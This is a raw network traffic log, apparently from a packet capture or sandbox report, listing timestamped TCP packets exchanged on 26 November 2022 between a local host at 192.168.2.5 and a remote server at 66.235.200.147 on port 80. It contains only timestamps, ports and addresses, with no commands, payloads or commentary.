Nov 26, 2022 11:17:39.996818066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.996865034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:39.996908903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.005932093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.006020069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.006061077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.006102085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.006144047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.006191015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.006211996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.006211996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.006258965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.006335974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.006942987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.006992102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.007035017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.007069111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.007097960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.007153034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.007165909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.007217884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.007263899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.007282972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.007329941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.007366896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.007404089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.008649111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.008697033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.008738041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.008760929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.008816004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.008835077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.008882999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.008929014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.008950949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.008995056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.009073019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.009637117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.009680986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.009725094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.009757042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.009792089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.009846926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.009860992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.009911060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.009955883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.009979010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.010020018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.010094881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.011159897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.011214972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.011257887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.011285067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.011324883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.011585951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.012904882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.012950897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.012993097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.013025999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.013060093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.013113976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.013130903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.013180017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.013215065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.013251066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.013896942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.013941050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.013987064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.013998032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.014055014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.014056921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.014117956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.014162064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.014204979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.014221907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.014276981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.014300108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.023276091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.023344040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.023391008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.023423910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.023454905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.023468971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.023521900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.023574114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.023597002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.024797916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.024872065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.024905920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.024939060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.024990082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025012016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.025057077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025105953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025124073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.025173903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025222063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025247097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.025289059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025337934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025357962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.025403023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025439978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.025481939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.026782036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.026828051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.026873112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.026918888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.026979923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.027048111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.027095079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.027137041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.027178049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.027196884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.027251959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.027282000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.028269053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.028314114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.028357983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.028376102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.028424978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.028458118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.028490067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.028541088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.028568983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.028606892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.028657913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.028687954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.030733109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.030778885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.030822039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.030865908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.030906916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.030910015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.030972958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031016111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031064987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.031070948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031135082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031158924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.031214952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031260967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031290054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.031327963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031374931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031394958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.031441927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031487942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031510115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.031553984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031601906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031621933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.031670094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.031739950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.032131910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.032179117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.032221079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.032269001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.032279015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.032335997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.032341003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.032401085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.032458067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.032464981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.032522917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.032598972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.033049107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.033101082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.033143044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.033185959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.033205032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.033258915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.033298016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.033354044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.033354998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.033416986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.033438921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.033502102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.034038067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034123898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034173965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034198999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.034240007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034287930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034310102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.034352064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034400940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034423113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.034470081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034518003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.034538984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.035109043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.035156012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.035197973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.035218954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.035288095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.035299063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.035355091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.035402060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.035423994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.035469055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.035537004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.035540104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.036021948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.036067009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.036101103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.036132097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.036185980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.036201000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.036251068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.036297083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.036319017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.036362886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.036416054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.036444902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.036938906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037019014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.037049055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037103891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037146091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037192106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037231922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.037269115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037281990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.037334919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037380934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037401915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.037446976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.037523031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.037998915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.038045883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.038088083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.038111925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.038155079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.038204908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.038222075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.038270950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.038322926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.038331985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.038388968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.038450003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.040380955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.040426016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.040467978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.040494919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.040541887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.040590048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.040607929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.040656090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.040726900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.041717052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.041743994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.041804075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.043003082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043031931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043057919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043086052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043113947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.043118954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043142080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.043162107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043210030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.043427944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043454885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043481112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043509960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.043515921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043550968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043565989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.043591022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043622017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043648005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.043657064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.043706894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.044696093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.044724941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.044751883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.044781923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.044785023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.044821978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.044842005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.044872999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.044903994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.044931889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.044938087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.044992924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.046366930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.046394110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.046420097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.046442032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.046452999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.046499968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.046513081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.046566010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.046622992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.048820019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.048849106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.048877954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.048907995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.048911095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.048950911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.048971891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.048989058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049020052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049036980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.049201965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049232006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049257994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.049268007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049299955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049329996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049333096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.049367905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049386978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.049410105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049438953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.049460888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.050497055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050525904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050554991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050559044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.050595999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050606012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.050637007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050664902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050685883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.050703049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050734997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050755024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.050772905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.050825119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.051037073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051064968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051094055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051120996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.051129103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051163912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051176071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.051204920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051234961 CET	80	49707	66.235.200.147	192.168.2.5
